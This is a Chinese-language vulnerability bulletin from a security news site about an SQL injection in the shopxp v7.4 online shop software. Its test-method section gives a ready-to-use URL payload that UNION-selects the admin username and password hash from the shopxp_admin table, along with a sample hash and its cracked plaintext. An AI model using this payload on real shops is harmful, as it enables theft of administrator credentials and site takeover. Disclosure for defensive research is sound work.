中文(Chinese) 英文(English) Tel: 4006-858-981           Msn: China@Safe.sh         QQ: 7387526       Server Hosting        加入收藏
主页 >> 安全风向标 >> 漏洞播报
安全风向标
分类
shopxp 购物系统 v7.4 SQL 注入漏洞
影响版本:
shopxp  v7.4

漏洞描述:

shopxp网上购物系统购物系统是一个经过完善设计的经典网上购物系统,适用于各种服务器环境的高效网上购物系统解决方案。shopxp网上购物系统是由北京易通联信科技有限公司具有丰富的 web 应用程序设计经验,尤其在购物系统产品及相关领域,经过长期创新性开发,掌握了一整套从算法,数据结构到产品安全性方面的领先技术,使得shopxp购物系统无论在稳定性、负载能力、安全保障等方面都居于国内外同类产品领先地位


测试方法:
[www.safe.sh]
本站提供程序(方法)可能带有攻击性,
仅供安全研究与教学之用,风险自负!

在网址后面加上: /TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin
爆出用户名和密码 注意:用户名和密码是连在一起的,后十六位是密码MD5加密  adminb1481eca94b12f75
等于用户名admin    

Md5加密密码:b1481eca94b12f75(解出38983806 )

Safe.sh安全建议:
暂无
等待官方补丁
页面工具 打印 | 电子邮件 | 评价
关于我们 | | 沪ICP备12021423号-1 | 联系我们 友情链接 | 站点地图 | 隐私 | 法律 | Copyright © 2018 Safe.Sh